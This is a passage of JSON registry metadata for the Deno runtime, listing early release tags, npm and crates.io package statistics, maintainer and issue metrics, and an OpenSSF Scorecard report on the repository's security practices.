/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-28T15:50:13.882Z","dependent_packages_count":0,"downloads":38170,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.354594294144324,"dependent_packages_count":36.69686831981711,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":31.025731306980717},"purl":"pkg:npm/%40deno/darwin-arm64","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@deno/darwin-arm64","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@deno/darwin-arm64","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@deno/darwin-arm64/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-28T02:34:50.351Z","issues_count":6619,"pull_requests_count":9639,"avg_time_to_close_issue":17209143.875658587,"avg_time_to_close_pull_request":1533351.1008099688,"issues_closed_count":3794,"pull_requests_closed_count":8024,"pull_request_authors_count":580,"issue_authors_count":2470,"avg_comments_per_issue":2.509442513974921,"avg_comments_per_pull_request":0.719680464778504,"merged_pull_requests_count":7006,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":663,"past_year_pull_requests_count":1197,"past_year_avg_time_to_close_issue":1426984.6098654708,"past_year_avg_time_to_close_pull_request":1334468.010687023,"past_year_issues_closed_count":223,"past_year_pull_requests_closed_count":655,"past_year_pull_request_authors_count":184,"past_year_issue_authors_count":365,"past_year_avg_comments_per_issue":1.2428355957767723,"past_year_avg_comments_per_pull_request":1.1161236424394319,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":14,"past_year_merged_pull_requests_count":483,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1795,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":283,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":391,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-arm64/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-arm64/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-arm64/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-arm64/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-arm64/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-arm64/codemeta","maintainers":[{"uuid":"ry","login":"ry","name":null,"email":"ry@tinyclouds.org","url":null,"packages_count":44,"html_url":"https://www.npmjs.com/~ry","role":null,"created_at":"2024-12-12T22:08:47.407Z","updated_at":"2024-12-12T22:08:47.407Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ry/packages"},{"uuid":"divy-work","login":"divy-work","name":null,"email":"dj.srivastava23@gmail.com","url":null,"packages_count":45,"html_url":"https://www.npmjs.com/~divy-work","role":null,"created_at":"2024-12-12T22:08:47.641Z","updated_at":"2024-12-12T22:08:47.641Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/divy-work/packages"},{"uuid":"denobot","login":"denobot","name":null,"email":"denobot@deno.com","url":null,"packages_count":28,"html_url":"https://www.npmjs.com/~denobot","role":null,"created_at":"2024-12-12T22:08:47.682Z","updated_at":"2024-12-12T22:08:47.682Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/denobot/packages"},{"uuid":"bartlomieju","login":"bartlomieju","name":null,"email":"biwanczuk@gmail.com","url":null,"packages_count":26,"html_url":"https://www.npmjs.com/~bartlomieju","role":null,"created_at":"2026-03-27T13:02:40.507Z","updated_at":"2026-03-27T13:02:40.507Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/bartlomieju/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5812038,"maintainers_count":1244003,"namespaces_count":426096,"keywords_count":888784,"github":"npm","metadata":{"funded_packages_count":192391,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-01T05:02:08.896Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11067587,"name":"lib_deno_resolver","ecosystem":"cargo","description":"Deno resolution algorithm","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":2,"first_release_published_at":"2024-11-20T17:58:35.293Z","latest_release_published_at":"2024-11-20T18:30:13.364Z","latest_release_number":"0.11.0","last_synced_at":"2026-08-29T21:57:17.766Z","created_at":"2024-11-20T18:01:14.547Z","updated_at":"2026-08-29T21:57:17.767Z","registry_url":"https://crates.io/crates/lib_deno_resolver/","install_command":"cargo install lib_deno_resolver","documentation_url":"https://docs.rs/lib_deno_resolver/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using 